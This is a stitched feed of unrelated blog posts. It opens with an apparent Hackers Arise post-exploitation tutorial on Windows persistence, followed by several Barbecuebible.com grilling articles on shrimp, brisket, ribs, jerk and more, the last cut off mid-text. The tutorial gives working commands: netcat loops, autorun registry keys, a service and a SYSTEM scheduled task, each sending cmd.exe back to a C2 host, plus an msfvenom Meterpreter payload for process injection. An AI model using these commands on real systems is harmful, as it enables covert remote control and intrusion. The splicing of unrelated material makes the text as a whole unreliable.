cmd$> start cmd /C "for /L %n in (1,0,10) do ( nc.exe C2 9001 -e cmd.exe & ping -n 60 127.0.0.1 )"

basic shell persistence with netcat on windows

This runs a new command shell to execute the quoted loop. The for /L construct is used to execute the loop body repeatedly. In practice the parameters chosen here make the body run continuously. Inside the loop the nc.exe invocation attempts to connect back to the C2. 

The chained ping -n 60 127.0.0.1 acts as a simple portable sleep to insert a roughly one-minute delay between connection attempts.

connection received

Pros: allows a controllable retry interval and can be launched from any user account without special privileges.

Cons: the loop stops on reboot, logoff, or if the shell/window is closed, so it does not survive reboots.

This method is useful when you already have an interactive session and want a low-effort way to keep trying to reconnect, but it’s a volatile form of persistence. Treat it as temporary rather than reliable long-term access. From a defensive perspective, repeated processes with outbound network connections are a high-value detection signal.

Autostart

Autostart locations are the canonical Windows persistence vectors because the operating system itself will execute items placed there at user logon or system startup. The two typical approaches shown are copying an executable into a Startup folder and creating entries under the Run registry keys. Below are two separate techniques you can use depending on your privileges:

cmd$> copy persistence.exe %APPDATA%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

cmd$> reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v persistence /t REG_SZ /d "C:\users\username\persistence.exe"

cmd#> copy persistence.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\

cmd#> reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v persistence /t REG_SZ /d "C:\Windows\system32\persistence.exe"

establishing persistence with windows autostart

Placing an executable (or a shortcut to it) in a per-user Startup folder causes the Windows shell to launch that item when the specific user signs in. Using the ProgramData (all-users) Startup folder causes the item to be launched for any interactive login. 

Writing a value into HKCU\Software\Microsoft\Windows\CurrentVersion\Run registers a command line that will be executed at logon for the current user and can usually be created without elevated privileges. Writing into HKLM\Software\Microsoft\Windows\CurrentVersion\Run creates a machine-wide autorun and requires administrative rights. 

Pros: survives reboots and will automatically run at each interactive logon (per-user or machine-wide), providing reliable persistence across sessions. 

Cons: startup autoruns have no fine-grained execution interval (they only run at logon) and are a well-known, easily monitored location, making them more likely to be detected and removed.

Services

Using a Windows service to hold a backdoor is more robust than a simple autostart because the Service Control Manager (SCM) will manage the process lifecycle for you. Services can be configured to start at boot, run before any user logs on, run under powerful accounts (LocalSystem, NetworkService, or a specified user), and automatically restart if they crash. Creating a service requires administrative privileges, but once installed it provides a durable, system-integrated persistence mechanism that survives reboots and can recover from failures without manual intervention.

cmd#> sc create persistence binPath= "nc.exe ‐e \windows\system32\cmd.exe C2 9001" start= auto

cmd#> sc failure persistence reset= 0 actions= restart/60000/restart/60000/restart/60000

cmd#> sc start persistence

establishing persistence with windows services

The first line uses sc create to register a new service named persistence. The binPath= argument provides the command line the service manager will run when starting the service. In practice this should be a quoted path that includes any required arguments, and many administrators prefer absolute paths to avoid ambiguity. start= auto sets the service start type to automatic so SCM will attempt to launch it during system boot. 

The second line configures the service recovery policy with sc failure: reset= 0 configures the failure count reset interval (here set to zero, meaning the failure count does not automatically reset after a timeout), and actions= restart/60000/restart/60000/restart/60000 tells the SCM to attempt a restart after 60,000 milliseconds (60 seconds) on the first, second and subsequent failures. This allows the service to be automatically relaunched if it crashes or is killed. 

The third line, sc start persistence, instructs SCM to start the service immediately. 

Pros: survives reboot, runs before user logon, can run under powerful system accounts, and can be configured with automatic restart intervals via the service recovery options.

Cons: creating or modifying services requires administrative privileges and is highly visible and auditable (service creation, service starts/stops and related events are logged and commonly monitored by endpoint protection and EDR solutions).

Scheduled Tasks

Scheduled tasks are a convenient and flexible way to maintain access because the Windows Task Scheduler supports a wide variety of triggers, run-as accounts, and recovery behavior. Compared with simple autostart locations, scheduled tasks allow precise control over when and how often a program runs, can run under powerful system accounts, and survive reboots. Creating or modifying scheduled tasks normally requires administrative privileges.

cmd#> schtasks /create /ru SYSTEM /sc MINUTE /MO 1 /tn persistence /tr "c:\temp\nc.exe -e c:\windows\system32\cmd.exe C2 9001"

establishing persistence with scheduled tasks

Here the schtasks /create creates a new scheduled task named persistence. The /ru SYSTEM argument tells Task Scheduler to run the job as the SYSTEM account (no password required for well-known service accounts), which gives the payload high privileges at runtime. The /sc MINUTE /MO 1 options set the schedule type to “minute” with a modifier of 1, meaning the task is scheduled to run every minute. /tn persistence gives the task its name, and /tr "..." specifies the exact command line the task will execute when triggered. Because Task Scheduler runs scheduled jobs independently of an interactive user session, the task will execute even when no one is logged in, and it will persist across reboots until removed.

connection received

Pros: survives reboot and provides a tightly controlled, repeatable execution interval (you can schedule per-minute, hourly, daily, on specific events, or create complex triggers), and tasks can be configured to run under high-privilege accounts such as SYSTEM.

Cons: creating or modifying scheduled tasks typically requires administrative privileges and Task Scheduler events are auditable and commonly monitored by enterprise defenses.

In-Memory

In-memory persistence refers to techniques that load malicious code directly into a running process’s memory without writing a persistent binary to disk. The goal is to maintain a live foothold while minimizing on-disk artifacts that antiviruses and file-based scanners typically inspect. A common pattern is to craft a payload that is intended to execute only in RAM and then use some form of process injection (for example, creating a remote thread in a legitimate process, reflective DLL loading, or other in-memory execution primitives) to run that payload inside a benign host process. The technique is often used for short-lived stealthy access, post-exploitation lateral movement, or when the attacker wants to avoid leaving forensic traces on disk.

First you generate a payload with msfvenom:

c2 > msfvenom ‐p windows/x64/meterpreter/reverse_tcp LHOST=C2_IP LPORT=9007 ‐f raw ‐o meter64.bin StagerRetryCount=999999

generating an in-memory payload with msfvenom

And then inject it into a running process:

cmd$> inject_windows.exe PID meter64.bin

injected a in-memory payload into process
reverse meterpreter shell received

Pros: extremely low on-disk footprint and difficult for traditional antivirus to detect, since there is no persistent executable to scan and many memory-only operations generate minimal file or registry artifacts.

Cons: does not survive a reboot and requires a mechanism to get code into a process’s memory (which is often noisy and produces behavioral telemetry that modern endpoint detection and response solutions can flag).

Defenders may monitor for anomalous process behavior such as unexpected parent/child relationships, unusual modules loaded into long-lived system processes, creation of remote threads, or unusual memory protections being changed at runtime.

Summary

We explored different basic Windows persistence options by comparing durability, visibility, and privilege requirements: simple shell loops let you keep retrying a connection from a user shell without elevation but stop at logoff or reboot. Autostart provides reliable logon-time execution and can be per-user or machine-wide depending on privileges. Scheduled tasks give precise, repeatable execution (including SYSTEM) and survive reboots. Services offer the most durable, pre-logon, auto-restarting system-level persistence but require administrative rights and are highly auditable. In-memory techniques avoid on-disk artifacts and are stealthier but do not persist across reboots and often produce behavioral telemetry. The core trade-off is that greater restart resilience and privilege typically mean more detectable forensic signals, defenders should therefore watch for repeated outbound connection patterns, unexpected autoruns, newly created services or scheduled tasks, and anomalous in-memory activity.

In the first part of Advanced Windows Persistence, we will dive into advanced techniques that will leverage the Configs, Debugger, GFlags and WMI.

The post Post Exploitation: Maintaining Persistence in Windows first appeared on Hackers Arise.

5 All-Time Favorite Grilled Shrimp Recipes You’ll Love

Why Shrimp Is America’s Favorite Shellfish

Quick: what’s America’s favorite shellfish?

Lobster? Maybe if you live in New England. Oysters? Yeah, we love them raw on the half-shell, but grilled they’re still pretty niche.

No, it turns out that our most consumed shellfish is the smallest in size. Shrimp.

By dollar and poundage, this diminutive crustacean remains our hands-down favorite. We Americans eat an average of 5.9 pounds per person per year.

Shrimp Around the World

We’re not alone. South Africans prize their piri-piri prawns, spiced up with fiery malagueta chiles. The Spanish pay exorbitant sums for carabinieros, briny crimson shrimp fished from the cold deep waters of the Bay of Biscay. Venetians thread their gamberoni onto skewers to be dusted with breadcrumbs and grilled kabab style. No Indian feast would be complete without yogurt- and spice-marinated tandoori shrimp.

BBQ Grill Pan - Grilled Shrimp

Regional Shrimp Varieties in the U.S.

But which shrimp? If you live on the southeastern seaboard, you eat delicate Carolina shrimp. If you come from Down East, you raise your fork for sweet white Maine shrimp. Down my way, in south Florida, we grill succulent Key West pinks. Californians and Hawaiians eat spot prawns (so named for the black eye-like carapace on the side of the shell.

Quite miraculously, in this age of global supply chains, shrimp remain mercifully regional, and each variety has its own distinct texture and flavor.

Buying Shrimp: Fresh, Farmed, or Imported?

But what if you don’t live near the coast? Seafood farms from around the globe (especially Southeast Asia) provide shrimp in all sizes as prices so modest, you wonder how they can do it.

Greek Grilled Shrimp

The short answer is don’t ask. The longer answer requires uncomfortable questions about dubious labor and environment practices. Whenever food comes cheap, you pay the price in other ways. But ask to sniff the shrimp before buying it: if it smells like bleach, don’t buy it.

For this reason, I always try to buy fresh local domestic shrimp. When in doubt, I buy from a store merchant that vets the provenance of its seafood, like Whole Foods, or I check with the Marine Stewardship Counsel.

Why Shrimp Is Perfect for Grilling

But my main job is to whet your appetite, not suppress it, and shrimp possesses many qualities that endear it to us grillers.

First, it’s quick to grill, delivering pure protein and superb taste in a matter of minutes. It readily absorbs spice, marinade, and smoke flavors, without losing its briny uniqueness. Speaking of taste, it has one of those flavors that seems to appeal to everyone—without the squeamishness often associated with sea urchin, oysters, or other shellfish.
Did we mention that it’s available everywhere and as seafood goes, mercifully affordable?

Five Key Questions Before Grilling Shrimp

But before you fire up your grill, you need to ask 5 key questions.

Does size matter? As in the bedroom, not really. Shrimp range in size from the diminutive Dutch garnall (so tiny you can fit a dozen in a tablespoon) to the Kenyan King (a single shellfish tips the scales at 3 pounds—split and grill as you would lobster). Here in the U.S., shrimp are sold by the “U” size—for example a U-16 means that there are 16 headless shrimp to a pound. When making kebabs, I use extra-large shrimp (U 16s). When grilling individual shrimp, I use U8s or U10s—also sold as “colossal.”

Head on or head off? In much of the world, people grill whole shrimp (that is with heads on). I’m down with that. Head on shrimp look cool and there’s a lot of flavor in the head. To paraphrase how Louisianans eat crawfish: suck the heads and pinch the tails.

Shell on or shell off? Both. I like grilling shrimp in the shell. Fire-charred shells add flavor and keep the meat moist. I like grilling peeled shrimp because they’re quicker and easier to eat. There’s time and occasion for both.

Tails on or off? Toss up here. A lot of restaurants leave the tails on (perhaps to remind you that the creature you’re about to heat once swam in the ocean). That fire charred tail adds a bit of flavor. But it also adds another step come time to eat the shrimp, so you can omit it with a clean conscience.

Emeril BBQ Shrimp - Grilled Shrimp Recipes

Should shrimp be deveined? Large ones yes. A visible black vein in a cooked shrimp is unsightly and can taste acrid. With smaller shrimp (or shrimp with no visible vein), I don’t bother peeling. Unless my wife is watching. Then I always peel shrimp.

How to Devein Shrimp (3 Easy Methods)

Tip: There are three ways to devein shrimp.

  1. Get yourself a shrimp peeler and deveiner. Insert the deveiner in the fat end of the shrimp and push. Vein removed QED.
  2. Butterfly the shrimp, that is make a V-shaped cut along the back of the shrimp to cut out the vein and flesh immediately surrounding it. Advantage of this method: the shrimp curls into an attractive butterfly shape as it cooks.
  3. The lazy way to devein a peeled shrimp: Insert the tine of a fork in the rounded part of the back under the vein and gently lift. Most of the time, the vein will pull right out.

How to Grill Shrimp

In a nutshell, direct grilled over high heat. I grill small shrimp kebab style (threaded on a bamboo or metal skewer). The skewer should pass through the head end and tail end so each shrimp lays flat on the grate. For the real monsters, I split them in half through the belly side, butterfly them open, and grill them as I would lobster.

Our 5 Favorite Shrimp Recipes

Check out our 1000+ Recipes section here on Barbecue Bible.Com

Also, sign up for our Up in Smoke newsletter so you don't miss any blogs and receive some special offers! PLUS get Raichlen's Burgers! PDF for free!

Follow Steven on Facebook, Instagram, YouTube, TikTok, Reddit, and Pinterest!

Check out our store powered by BBQGuys!

The post 5 All-Time Favorite Grilled Shrimp Recipes You’ll Love appeared first on Barbecuebible.com.

Brisket in a Minute?—Impossible, But it’s True!

photo: baekjeongnyc – Instagram

 
It’s an article of faith, not to say dogma, that the proper way to cook brisket is low in slow—that is at a low heat for a very loooooooooong time—a half day or more for a full packer brisket. You need that slow, gentle heat to melt the collagen and make the meat tender without drying it out.

Yes, there are hot and fast briskets that cook in a few hours. Our test kitchen director made one that ranks pretty high on the deliciousness scale.

But what if I told you there’s a brisket dish you can cook in 2 minutes—I repeat 2 MINUTES—directly over a screaming hot fire. You’d think I was crazy.

The Secret to Cooking Brisket in Just Two Minutes

Or so I believed until I visited Baekjeong KBBQ restaurant in the heart of New York’s Koreatown. Here the chef slices frozen brisket points across the grain on a meat slicer. The slices come out so paper-thin, the meat cooks in a matter of minutes. It simply doesn’t have time or heft to get tough. You could think of this direct grilled brisket as steak on steroids, with a rich meaty beefy flavor every bit as intense as slow-cooked brisket, but as easy to chew as filet mignon.

Kang Ho Dong Baekjeong NYC

 

The brisket itself comes unseasoned. The fireworks come from a table-burying selection of sauces and condiments collectively known as panchan. Like so much Korean grilled meat, you eat grilled brisket taco-style: wrapped in lettuce leaves. Think of it as barbecue health food.

The easiest way to slice the meat for this extraordinary brisket is on an electric meat slicer. Serious carnivores may own one already. I’ve come up with a work-around using a food processor. In a pinch, you could try hand slicing. Either way, place the brisket in the freezer until softly frozen. You don’t want it hard as a rock. If you happen to live in an area with a large Korean community, you may be able to buy the brisket pre-sliced.

Baekjeong NYC

photo: Kang Ho Dong Baekjeong NYC – Instagram

 

Here, then, is a brisket dish most of us would never dream possible. Two minute brisket. Really! One bite of the luscious, seared, sizzling smoky beef will make you a believer.

Recipe: Two Minute Korean Brisket

Check out our 1000+ Recipes section here on Barbecue Bible.Com

Also, sign up for our Up in Smoke newsletter so you don't miss any blogs and receive some special offers! PLUS get Raichlen's Burgers! PDF for free!

Follow Steven on Facebook, Instagram, YouTube, TikTok, Reddit, and Pinterest!

Check out our store powered by BBQGuys!

The post Brisket in a Minute?—Impossible, But it’s True! appeared first on Barbecuebible.com.

3-2-1 Ribs Revisited: Is It Time for New Math?

Most serious practitioners consider barbecue an art, the outcome of which depends on knowledge, skill, and intuition. Which is why I’m skeptical of formulaic approaches like the 3-2-1 method for cooking pork spare ribs. Last year, in what turned out to be one of my most visited blog posts to date, I wrote:

And if you serve ribs cooked by the 3-2-1 method, 95 percent of the people who taste them will react with delight and will declare you a genius. My guests sure did, and I did not deflect their praise. And yet … and yet … I felt a certain discomfort accepting my guests’ compliments. These were good ribs. Safe ribs. Ribs by rote. These were ribs almost anyone could love on account of their moistness and tenderness.

(If you are unfamiliar with it, the 3-2-1 approach calls for smoking the ribs for 3 hours, cooking for 2 hours tightly wrapped in foil, and unwrapping for the final hour for a total of 6 hours.)

This barbecue-by-the-numbers method is undeniably popular among backyard pit masters and on the competition circuit, where it is believed to have originated. So why do I keep revisiting it? I have never been totally satisfied with ribs barbecued according to the 3-2-1 formula. Sometimes, the chew skews from tender to mushy. The bark softens in the steam while the ribs are foiled. The rub disappears. The flavors seem dialed down, a bit washed out, almost like boiled ribs.

3-2-1 Barbecued Spare Ribs - Step 8

After experimenting, I identified the primary cause of the problems: The ribs were simply spending too much time in the steamy environment of the foil.

I’m now a proponent of the 3-1-1 method. (Not as catchy as 3-2-1, but oh well.) Below are the particulars. Note: If using baby back ribs, cut the smoking time down to 2 hours.

Step-by-Step Guide to the 3-1-1 Method Ribs

  • Start with the best spare ribs you can buy, preferably heritage breed and never frozen. Buy St. Louis-style ribs or trim them yourself. One rack feeds 2 to 3 people. Remove the papery membrane from the bone side of the ribs as it impedes the absorption of smoke and spices.

    St. Louis Ribs on the smoker - 3-1-1 Ribs

  • Apply your favorite rub (I’m partial to my Planet Barbecue Kansas City Smoke Rub) to both sides of the ribs an hour or so before you intend to cook. The salt in the rub draws some of the moisture from the surface of the meat, giving you better bark.

  • In the meantime, set up your smoker according to the manufacturer’s instructions and preheat to 250 degrees F. (Alternatively, set up your charcoal grill for indirect grilling and preheat to the same temperature.) If using wood chips to generate smoke, soak in water for at least 30 minutes, then drain. (I don’t bother soaking wood chunks.) Place a shallow pan of water in the cook chamber if not using a smoker with a built-in water pan. You could add moisture to the ribs by mopping, but repeated opening and closing of the lid compromises the temperature’s stability.

  • Once the temperature has stabilized in your smoker or grill, arrange the ribs on the grate, bone side down. If smoking several racks at once, use a rib rack. Immediately close the lid. Smoke for 3 hours, replenishing the fuel, water, and/or smoking wood as necessary.

  • For each rack of ribs, tear off a rectangle of heavy-duty aluminum foil large enough to completely enclose the ribs. Quickly remove the ribs from the smoker or grill and replace the lid to avoid heat loss. Place each rack, meat side down, on a piece of aluminum foil and bring up the sides. If desired, pour 1/4 cup of apple cider, beer, ale, or other flavorful liquid on top of the bones and dot with thin slices of butter. Bring the edges of the foil together and fold to make a tight package. Return to the smoker or grill and cook for 1 hour. (You no longer need to add smoking chips or chunks to the fire.)

    3-1-1 Barbecued Spare Ribs

  • Remove the ribs from the smoker or grill. (Again, work quickly to maintain cooking temperatures.) Carefully open the foil package; wear heatproof food gloves to avoid steam burns. Insert a toothpick between the bones in the thickest part of the meat; it should penetrate fairly easily. Using tongs, lift the ribs from the foil. Discard the foil. Reserve the juices, if desired, and boil down to make a glaze. Don’t bother if you’re only doing 1 or 2 racks.

  • If desired, dust the ribs lightly with more rub. Return to the smoker or grill, meat side up, or to the grill rack. Cover and continue to cook for 1 hour. Again, insert a toothpick between the bones to test for doneness. If the toothpick doesn’t penetrate easily, continue to cook until it does, testing at 15-minute intervals. (Another test for doneness requires you to lift the rack of ribs up by one end. If it begins to bend and form a shreddy crack between the middle bones, the ribs are tender.) If you made a glaze, apply it now. I like to serve barbecue sauce on the side. But you can apply it the last 30 minutes of the cook or sizzle it in over a hotter grill for the last 5 minutes. Please note that sweeter sauces burn easily, so watch them carefully.

St. Louis Ribs at Barbecue University

Bottom line? The success of ribs, like brisket or pork shoulder, still depends on human intuition. Use the above formulas as guidelines, recognizing that a particular rack of ribs might need more or less time on the grill. Be flexible. If the ribs are done before your guests arrive, loosely wrap them in foil and stow in an insulated cooler until serving time. If the ribs need more time, have some interesting grilled appetizers at the ready.

Do you have a fail-safe method for barbecuing ribs? Please share it with us on social media!

Related Reads

Check out our 1000+ Recipes section here on Barbecue Bible.Com

Also, sign up for our Up in Smoke newsletter so you don't miss any blogs and receive some special offers! PLUS get Raichlen's Burgers! PDF for free!

Follow Steven on Facebook, Instagram, YouTube, TikTok, Reddit, and Pinterest!

Check out our store powered by BBQGuys!

The post 3-2-1 Ribs Revisited: Is It Time for New Math? appeared first on Barbecuebible.com.

Go for the Burn: Authentic Jamaican Jerk at Home

Photo by Rob Baas.

Updated for 2025

What Makes Jamaican Jerk So Fiery?

As anyone who has eaten real-deal Jamaican jerk can tell you, it hurts. Smoke gets in your eyes and Scotch bonnet chiles scorch your gullet.

“You need to sweat while you’re eating jerk,” says my friend, Gary Feblowitz (we met on the set of Project Smoke).

An Emmy award-winning videographer (you’ve seen his work on the Discovery Channel and PBS), Feblowitz is one of jerk’s most zealous evangelists. The license plate on his SUV reads “JRKMSTR.” (I’m guessing that would play well in Kingston, but might be misinterpreted in Gary’s home state of Minnesota.)

The Story Behind Authentic Jerk Ingredients

Gary’s jerk epiphany occurred when a vacation to Jamaica was extended two weeks by a medical emergency that prohibited air travel. He knew the key to authentic jerk was the pimento (allspice) tree—its fruit (allspice berries), leaves, and especially, its fragrant wood. He wanted to import these ingredients into the U.S., but the Jamaican government had banned pimento exports in the early 1900s after demand for the dense, beautiful wood nearly wiped out the supply. (At the time, it was popular for umbrella handles.) Gary proposed to use only trim or felled trees and plant three for every one he imported. The Jamaican officials agreed.

Gary Feblowitz and Steven Raichlen on the set of Project Smoke

Gary Feblowitz (left), owner of Exotic Wood Chips, LLC, with Steven Raichlen on the set of Project Smoke. In addition to being a jerkmaster, Gary is an Emmy award-winning videographer. Photo by Rob Baas.

Like North American barbecue, Jamaican jerk is simultaneously a dish, a cooking method, and a way of life—a noun and a verb.

Historically, jerk is associated with the Maroons, runaway slaves who settled in the mountains when the British defeated their Spanish owners in 1655. The Maroons hunted wild boar, which they rubbed with a fiery paste of salt, spices, onions, ginger, and chiles, and cooked it slowly over smoldering pimento or laurel wood fires in earthen pits. The method tenderized and preserved the meat, and more importantly, produced little smoke, which would have given away their positions. (Cuba’s lechon asado and Hawaii’s kālua pig are similar.)

Sauce Goddess Jerk Spice

Modern Jamaican Jerk: Methods and Proteins

Today, Jamaica’s “jerkmen” are more likely to cook in modified steel drums or shallow trough-like grills covered with sheets of corrugated tin. Once you master the basics, you can jerk almost any protein on your gas or charcoal grill or smoker. Chicken and pork are the most popular meats, but I’ve also encountered jerk snapper, lobster, shrimp, and even tofu. Gary confided one of his favorite preparations is jerk brisket. We can’t wait to try that!

Key Ingredients in Jamaican Jerk Seasoning

Most jerk ingredients are available at any supermarket.

  • Scotch bonnet chile: One of the world’s most fiery chiles (100,000 to 350,000 Scoville units), with a sweet heat that blooms in the mouth rather than bludgeons. But still approach with caution. For less heat, seed the peppers. If you cannot find Scotch bonnets, substitute habaneros. Wear gloves when handling.
  • Pimento wood: This fragrant tropical tree is one of the defining flavors of jerk. To be strictly authentic, cook the food on a grate of pimento wood sticks and generate smoke with pimento wood chips. Because it is so dense, the sticks can be reused if you work over a low fire.
  • Pimento berries and leaves: Pimento berries—also called allspice—are available in the spice aisle of most supermarkets. Be sure to buy whole berries, not ground allspice. Gary (see website above) usually carries dried pimento leaves. If they are unavailable, substitute bay leaves.

Get The Recipes

Cooking Tips for Authentic Jamaican Jerk Chicken

Use fresh ingredients whenever possible: Fresh scallions, thyme, and Scotch bonnet peppers make a huge difference in flavor compared to dried or bottled substitutes.

Marinate overnight: Let your chicken soak in the jerk marinade for at least 8 hours, preferably overnight, to deeply infuse those bold, spicy flavors.

Get your grill ready for indirect heat: Jamaican jerk is traditionally cooked low and slow over indirect heat, often with pimento wood smoke if you can find it. This helps develop that smoky crust without burning the spices.

Don’t rush the cooking: Keep the grill temperature around 275-300°F (135-150°C) and cook the chicken slowly. This locks in moisture and allows the spices to caramelize nicely.

Use a meat thermometer: Cook chicken to an internal temperature of 165°F (74°C) for safe, juicy results.

Add smoke for extra flavor: If you have a smoker or pellet grill, adding a bit of wood smoke (hickory, apple, or preferably pimento wood) enhances that authentic jerk aroma.

Baste occasionally: Spoon or brush reserved marinade or a bit of oil on the chicken during cooking to keep it moist and flavorful.

Rest before serving: Let the chicken rest for 5-10 minutes after cooking. This helps the juices redistribute for a tender bite.

Check out our 1000+ Recipes section here on Barbecue Bible.Com

Also, sign up for our Up in Smoke newsletter so you don't miss any blogs and receive some special offers! PLUS get Raichlen's Burgers! PDF for free!

Follow Steven on Facebook, Instagram, YouTube, TikTok, Reddit, and Pinterest!

Check out our store powered by BBQGuys!

The post Go for the Burn: Authentic Jamaican Jerk at Home appeared first on Barbecuebible.com.

Your Summer Cookout Just Got Better! Hotdog Burnt Ends and High Voltage Hamburgers

Summer cookouts are about two things: the people you hang out with and the food you eat. If you are like me, you probably want to impress your guests with the food when hosting a cookout. I’m often asked how many grills I use to cook all the food. Whether you are cooking with one or six grills, you can prepare a delicious spread for your friends and family.

Recipes for Your Summer Cookout

There are two classic items that are on the menu when attending a cookout: hamburgers and hotdogs. I think you can have lots of fun with how you dress them up. Feel free to keep it simple, but if you are looking for creative ways to prepare hamburgers and hotdogs, check out my previous blog posts—“Battle Of the Grilled Beef Burgers” and “Battle of the Grilled Hotdogs.

I realized it would be difficult to prepare hamburgers and hotdogs multiple ways like I did for a big crowd. So, pick one or two of your favorites from below and fire up the grill. Here is how I utilized what I had.

I decided to prepare two appetizers as well as grilling hamburgers and hotdogs. The appetizers were not necessary but gave me a reason to fire up the smoker.

Creative Recipes to Boost Your Summer BBQ

I made hotdog burnt ends and smoked meatballs. To prepare the hotdogs, I lightly coated them with yellow mustard and then seasoned them with my homemade barbecue rub. I smoked the hotdogs at 225 degrees for about an hour. The hot dogs were then sliced into one-inch pieces and topped with brown sugar, honey, butter, and barbecue sauce. I turned the temperature up to 350 and smoked the hotdogs for an additional 30 minutes.

Hot Dog Burnt Ends on the Grill

To make the meatballs, I used ground beef (2 pounds) and mixed in sautéed onions and mushrooms, egg, breadcrumbs, parsley, salt, and pepper. I cooked a tester patty to check the seasoning. I used an ice cream scoop to portion out the meatballs so they would all be the same size. The meatballs smoked with the hotdogs at 225 degrees for 30 minutes. I basted the meatballs with barbecue sauce, and they smoked at 350 degrees until they reached 160 degrees on an instant-read thermometer.

Smoked Meatballs

Now for the main event. I set up my Big Green Egg XL (BGE) for direct grilling. To create a safety zone, I left one of the half-moon diffuser plates in the BGE. I inserted the cast-iron grates into the Egg. I like how the cast-iron grates create a crusty exterior on hamburgers. I seasoned the hamburgers with kosher salt and black pepper. Once the cast-iron grates were hot, I placed the hamburgers and hot dogs on the grill. The hotdogs cooked quickly, about a minute a side. The hamburgers cooked 90 seconds, and then I gave them a quarter turn and cooked for another 90 seconds. I flipped the burgers and repeated the process. I topped the hamburgers with smoked Gouda cheese and then moved them to the safe zone while the cheese melted. I toasted the brioche buns, and it was time to put it altogether.

Hot Dogs and Hamburgers on the Grill for Summer Cookout Recipes

I went with a classic preparation for the hotdogs and served them with Dijon mustard, relish, and celery seeds. The hamburgers were prepared with my wife’s and my favorite toppings. For my wife’s hamburger, lettuce, sliced tomato, sliced avocado, and ranch dressing. My toppings included lettuce, tomato, bacon, pickles, and ketchup.

The Results

The hotdogs had a great beef flavor. There was a nice snap when I took a bite of the hotdog. The spice of the mustard and sweet relish paired well with the hotdog. The hamburgers were juicy on the inside due to the marbling. The seasoning and the high heat of the cast-iron grates created a crusty exterior. The charcoal fire added a smoky aroma. The lettuce, tomato, and pickle add a fresh flavor to the hamburger. The smoked Gouda cheese and bacon boost the smoky flavor of the burger.

The hotdog burnt ends were sweet, crusty, and the beef flavor came through. They will not be confused with true brisket burnt ends, but they were tasty and took less time to cook. The smoked meatballs were moist, and the onions and mushrooms complemented the flavor of the beef. The barbecue sauce created a flavor profile I’m not used to on a meatball, but was delicious.

Summer Cookout - Hamburgers, Hot Dog Burnt Ends, and Smoked Meatballs

Check out our 1000+ Recipes section here on Barbecue Bible.Com

Also, sign up for our Up in Smoke newsletter so you don't miss any blogs and receive some special offers! PLUS get Raichlen's Burgers! PDF for free!

Follow Steven on Facebook, Instagram, YouTube, TikTok, Reddit, and Pinterest!

Check out our store powered by BBQGuys!

The post Your Summer Cookout Just Got Better! Hotdog Burnt Ends and High Voltage Hamburgers appeared first on Barbecuebible.com.

A Grilled BLT Salad with a Bold Jerky Twist

Do you love Bacon? Do you love Beef Jerky? Have you ever heard of Bacon Jerky? Recently, I tried something a little different for a Grilled BLT Salad — swapping traditional bacon for uncured bacon jerky!

The jerky came from JerkyBrands.com, an online store that offers a huge selection of jerky, including something rare like bacon jerky. I used a Smoked Applewood flavoring. But there are many others, like Old Fashioned Maple, Sriracha, and BBQ.

Bacon Jerky

Why Bacon Jerky?

Bacon jerky isn’t your everyday snack. It’s not something you come across in your local grocery store very often. Unlike traditional bacon strips, bacon jerky is cured and dried like regular jerky, delivering an intense smoky flavor and chewy texture that’s perfect replacement for bacon on a BLT Salad.  But why replace bacon at all?  Because it’s fun and different.

For barbecue enthusiasts and jerky fans, bacon jerky is a unique twist that adds extra depth to dishes. The smoked applewood flavor I used brought a rich, sweet-smoky profile to the salad, complementing the fresh greens and ripe tomatoes perfectly.

Finding Great Jerky Online

If you have driven between Los Angeles and Las Vegas, you might know the famous Alien Jerky place off the 15 Freeway — a mecca for jerky lovers with its massive selection. There is also Buc-ees’s, a Texas staple. But outside of driving on the highway going on a special trip, it’s rare to find a store with as wide a range of jerky.

JerkyBrands.com caught my attention because of its huge variety — from classic beef jerky to exotic flavors, and yes, even bacon jerky. Shopping for jerky online means you get access to hard-to-find jerky.

How I Made the Grilled BLT Salad

I followed Steven’s Grilled BLT Salad recipe but with one key upgrade: instead of frying bacon, I added chunks of the smoked applewood uncured bacon jerky right on top. The jerky’s chewy, sweet and smoky goodness worked perfectly with the grilled lettuce, fresh heirloom tomatoes right from our garden, and creamy dressing.

Coals on the Grill - Bacon Jerky On the Grill Homemade Bread Sticks Bacon Jerky on the Girll

Another option is to GRILL the bacon jerky. Steven always says that everything tastes better, grilled, and the bacon jerky did not disappoint. The sugar on the jerky caramelized and gave the jerky a nice crunch.

If you’re curious to try something different with your next grilled salad or just a snack, bacon jerky is a tasty way to add smoky flavor and texture. Thanks to JerkyBrands.com, it’s easier than ever to find unique jerky varieties like bacon jerky. Give it a try and see how a little jerky twist can change it up.

Related Reads

Check out our 1000+ Recipes section here on Barbecue Bible.Com

Also, sign up for our Up in Smoke newsletter so you don't miss any blogs and receive some special offers! PLUS get Raichlen's Burgers! PDF for free!

Follow Steven on Facebook, Instagram, YouTube, TikTok, Reddit, and Pinterest!

Check out our store powered by BBQGuys!

The post A Grilled BLT Salad with a Bold Jerky Twist appeared first on Barbecuebible.com.

Barbecue on the Griddle? A Revolutionary Technique for Smoking on a Flattop

The Surprising Technique of Smoking on the Griddle

Every once in a while, a cooking technique comes along that sounds so improbable, you’d never think to try it.

But that turns out to be so essential, you’ll wish you had thought of it earlier.

I speak of smoking on the griddle.  Aka barbecue on the griddle.   Aka an impossibility.  Only it’s not only possible.   It’s impossibly cool.

Why I’m Obsessed with Griddling Lately

If I seem obsessed by griddling lately, it’s because I just published a new book called Project Griddle.   No, I haven’t given up grilling—that will never happen.   But I have added several outdoor griddles to my grill collection at home and I use them to turn out some amazing food.

Why bother with outdoor griddles?   Well, there are certain foods you just can’t cook on a grill.   The short list includes pancakes, eggs, fried-rice, A5 wagyu steaks, and delicate fish.   More on those in a previous blog.   You can even use a griddle to cook steaks, chops, and kebabs.

But unlike a grill, the one thing a griddle can’t do is smoke.   As in smoking to make barbecue.   Or can it?   While writing Project Griddle, I came up with a revolutionary technique, for it turns out you CAN smoke on a griddle.   Not just one way, but two.

Smoke Griddling Method #1: Charcoal Grill with Cast Iron Griddle

Smoke Method #1

I developed this technique during my first ventures with griddling on a charcoal grill.   I spread the coals in an even layer.   I set my portable cast iron griddle on the grate and heated it.   To check when it was ready, I sprinkled a few drops of water on the griddle—when they evaporated in 2 to 3 seconds, the griddle was sufficiently hot.    

